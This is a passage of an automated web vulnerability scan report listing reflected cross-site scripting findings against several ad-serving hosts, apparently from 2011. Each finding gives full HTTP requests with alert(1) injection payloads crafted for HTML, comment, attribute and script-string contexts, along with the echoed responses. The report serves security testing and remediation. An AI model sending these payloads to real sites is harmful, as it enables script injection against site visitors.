document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=300x250&referrer=http://www.tmz.com/&inv_code=2298003f3e33'-alert(1)-'9eac11f134b&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D2298003f3e33%27-alert%281%29-%279eac11f134b%26r%3D1%26_salt%3D1576960469%26u%3Dhttp%253A
...[SNIP]...
|
4.43. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ads.adsonar.com |
| Path: |
/adserving/getAds.jsp |
Issue detail
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 379d8<script>alert(1)</script>9352c1ee60b was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1500495&pid=2083767379d8<script>alert(1)</script>9352c1ee60b&zw=300&zh=250&url=http%3A//www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/&v=5&dct=Exclusive%3A%20Melissa%20Rivers%20Splits%20With%20Boyfriend%20%7C%20tooFab.com&ref=http%3A//www.toofab.com/&metakw=Melissa%20Rivers,Joan%20Rivers,Jason%20Zimmerman HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:04 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
<html>
<head>
<title>Ads by Quigo</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
java.lang.NumberFormatException: For input string: "2083767379d8<script>alert(1)</script>9352c1ee60b"
</head>
...[SNIP]...
|
4.44. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ads.adsonar.com |
| Path: |
/adserving/getAds.jsp |
Issue detail
The value of the placementId request parameter is copied into an HTML comment. The payload cb6e8--><script>alert(1)</script>c9166046b4e was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1500495cb6e8--><script>alert(1)</script>c9166046b4e&pid=2083767&zw=300&zh=250&url=http%3A//www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/&v=5&dct=Exclusive%3A%20Melissa%20Rivers%20Splits%20With%20Boyfriend%20%7C%20tooFab.com&ref=http%3A//www.toofab.com/&metakw=Melissa%20Rivers,Joan%20Rivers,Jason%20Zimmerman HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:51:47 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3356
Content-Type: text/plain
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<body>
<!-- java.lang.NumberFormatException: For input string: "1500495cb6e8--><script>alert(1)</script>c9166046b4e" -->
...[SNIP]...
|
4.45. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ads.adsonar.com |
| Path: |
/adserving/getAds.jsp |
Issue detail
The value of the ps request parameter is copied into an HTML comment. The payload 92fce--><script>alert(1)</script>3d86a354bdc was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1512388&pid=1098767&ps=-192fce--><script>alert(1)</script>3d86a354bdc&zw=250&zh=325&url=http%3A//www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/&v=5&dct=Nancy%20Grace%20--%20RUMPSHAKIN'%20in%20the%20TMZ%20Ballroom!!%20%7C%20TMZ.com&ref=http%3A//www.tmz.com/&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:58:08 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3870
Content-Type: text/plain
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<body>
<!-- java.lang.NumberFormatException: For input string: "-192fce--><script>alert(1)</script>3d86a354bdc" -->
...[SNIP]...
|
4.46. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ads.bluelithium.com |
| Path: |
/st |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b778"-alert(1)-"c081c9a4e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=1x1§ion=2475049&2b778"-alert(1)-"c081c9a4e0=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:19 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 01:12:19 GMT
Pragma: no-cache
Content-Length: 4667
Age: 0
Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?2b778"-alert(1)-"c081c9a4e0=1&Z=1x1&s=2475049&_salt=2441704624";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array
...[SNIP]...
|
4.47. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ads.bluelithium.com |
| Path: |
/st |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 960fe"><script>alert(1)</script>af24f5e639e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=1x1§ion=2475049&960fe"><script>alert(1)</script>af24f5e639e=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:19 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 01:12:19 GMT
Pragma: no-cache
Content-Length: 4712
Age: 0
Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ads.bluelithium.com/imageclick?960fe"><script>alert(1)</script>af24f5e639e=1&Z=1x1&s=2475049&_salt=983545231&t=2" target="_parent">
...[SNIP]...
|
4.48. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ads.tw.adsonar.com |
| Path: |
/adserving/getAds.jsp |
Issue detail
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 7b4c8<script>alert(1)</script>7900287ce39 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1459308&pid=10397677b4c8<script>alert(1)</script>7900287ce39&ps=-1&zw=590&zh=225&url=http%3A//www.tmz.com/&v=5&dct=Celebrity%20Gossip%20%7C%20Entertainment%20News%20%7C%20Celebrity%20News%20%7C%20TMZ.com&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:49:31 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
<html>
<head>
<title>Ads by Quigo</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
java.lang.NumberFormatException: For input string: "10397677b4c8<script>alert(1)</script>7900287ce39"
</head>
...[SNIP]...
|
4.49. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ads.tw.adsonar.com |
| Path: |
/adserving/getAds.jsp |
Issue detail
The value of the placementId request parameter is copied into an HTML comment. The payload 1c8c0--><script>alert(1)</script>d8f33500b41 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=14593081c8c0--><script>alert(1)</script>d8f33500b41&pid=1039767&ps=-1&zw=590&zh=225&url=http%3A//www.tmz.com/&v=5&dct=Celebrity%20Gossip%20%7C%20Entertainment%20News%20%7C%20Celebrity%20News%20%7C%20TMZ.com&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:58 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3321
Content-Type: text/plain
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<body>
<!-- java.lang.NumberFormatException: For input string: "14593081c8c0--><script>alert(1)</script>d8f33500b41" -->
...[SNIP]...
|
4.50. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ads.tw.adsonar.com |
| Path: |
/adserving/getAds.jsp |
Issue detail
The value of the ps request parameter is copied into an HTML comment. The payload 4ea7c--><script>alert(1)</script>2eed884a416 was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1459308&pid=1039767&ps=-14ea7c--><script>alert(1)</script>2eed884a416&zw=590&zh=225&url=http%3A//www.tmz.com/&v=5&dct=Celebrity%20Gossip%20%7C%20Entertainment%20News%20%7C%20Celebrity%20News%20%7C%20TMZ.com&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:35 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3760
Content-Type: text/plain
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<body>
<!-- java.lang.NumberFormatException: For input string: "-14ea7c--><script>alert(1)</script>2eed884a416" -->
...[SNIP]...
|
4.51. http://alerts.4info.com/alert/ads/dispatcher.jsp [ad_creative_id parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://alerts.4info.com |
| Path: |
/alert/ads/dispatcher.jsp |
Issue detail
The value of the ad_creative_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba94d'%3balert(1)//bdd52ed5568 was submitted in the ad_creative_id parameter. This input was echoed as ba94d';alert(1)//bdd52ed5568 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522ba94d'%3balert(1)//bdd52ed5568&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17204
Date: Sat, 17 Sep 2011 01:53:26 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
hone1.value + document.alertForm.phone2.value + document.alertForm.phone3.value;
var url = 'http://alerts.4info.com/SetUpAlert?serviceID=4' + '&umda=tel:' + phoneNo;
url += '&creativeID=10000522ba94d';alert(1)//bdd52ed5568&affiliateID=null' + '&referralURL=http://www.bostonherald.com/mobile/info.bg';
var leagueId = _gel('leagueId').value;
if (leagueId == NASCAR_leagueId) url += "&leagueID=" + leagueId;
els
...[SNIP]...
|
4.52. http://alerts.4info.com/alert/ads/dispatcher.jsp [ad_referral_url parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://alerts.4info.com |
| Path: |
/alert/ads/dispatcher.jsp |
Issue detail
The value of the ad_referral_url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bfe2'%3balert(1)//712e3a0ece8 was submitted in the ad_referral_url parameter. This input was echoed as 5bfe2';alert(1)//712e3a0ece8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg5bfe2'%3balert(1)//712e3a0ece8&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17204
Date: Sat, 17 Sep 2011 01:51:15 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
ue;
var url = 'http://alerts.4info.com/SetUpAlert?serviceID=4' + '&umda=tel:' + phoneNo;
url += '&creativeID=10000522&affiliateID=null' + '&referralURL=http://www.bostonherald.com/mobile/info.bg5bfe2';alert(1)//712e3a0ece8';
var leagueId = _gel('leagueId').value;
if (leagueId == NASCAR_leagueId) url += "&leagueID=" + leagueId;
else url += "&teamID=" + _gel('teamId').value;
if (window.XMLHttpReque
...[SNIP]...
|
4.53. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_bg parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://alerts.4info.com |
| Path: |
/alert/ads/dispatcher.jsp |
Issue detail
The value of the color_bg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90c0f"><script>alert(1)</script>584e56fd634 was submitted in the color_bg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef90c0f"><script>alert(1)</script>584e56fd634&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17277
Date: Sat, 17 Sep 2011 01:52:07 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<div style="width:nullpx;font-size:10px;font-family:Verdana, Arial, Helvetica, sans-serif;line-height:13px;color:#000000;background-color:#efefef90c0f"><script>alert(1)</script>584e56fd634">
...[SNIP]...
|
4.54. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_bg parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://alerts.4info.com |
| Path: |
/alert/ads/dispatcher.jsp |
Issue detail
The value of the color_bg request parameter is copied into the HTML document as plain text between tags. The payload 235f2<script>alert(1)</script>4125eaa7b51 was submitted in the color_bg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef235f2<script>alert(1)</script>4125eaa7b51&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17271
Date: Sat, 17 Sep 2011 01:52:10 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<style type="text/css">
html, body { margin:0; padding:0; height:100%; border:none; background-color:efefef235f2<script>alert(1)</script>4125eaa7b51 }
</style>
...[SNIP]...
|
4.55. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_border parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://alerts.4info.com |
| Path: |
/alert/ads/dispatcher.jsp |
Issue detail
The value of the color_border request parameter is copied into the HTML document as plain text between tags. The payload aa51b<script>alert(1)</script>c93f4630dc4 was submitted in the color_border parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefefaa51b<script>alert(1)</script>c93f4630dc4&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17189
Date: Sat, 17 Sep 2011 01:51:48 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
rder:none; }
a, a:visited { color:#000099; font-weight:bold; }
.MainContentArea { background-color:#efefef; font-family:Verdana, Arial, Helvetica, sans-serif; }
.HasBorder { border:solid 1px #efefefaa51b<script>alert(1)</script>c93f4630dc4; }
.TitleText { color:#000000; font-weight:bold; font-size:10px; }
.NormalText { color:#000000; font-size:10px; }
.MsgText { color:red; font-size:10px; }
.nobold { font-weight:normal; }
#header
...[SNIP]...
|
4.56. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_link parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://alerts.4info.com |
| Path: |
/alert/ads/dispatcher.jsp |
Issue detail
The value of the color_link request parameter is copied into the HTML document as plain text between tags. The payload 76dc4<script>alert(1)</script>e5a3998eb1c was submitted in the color_link parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
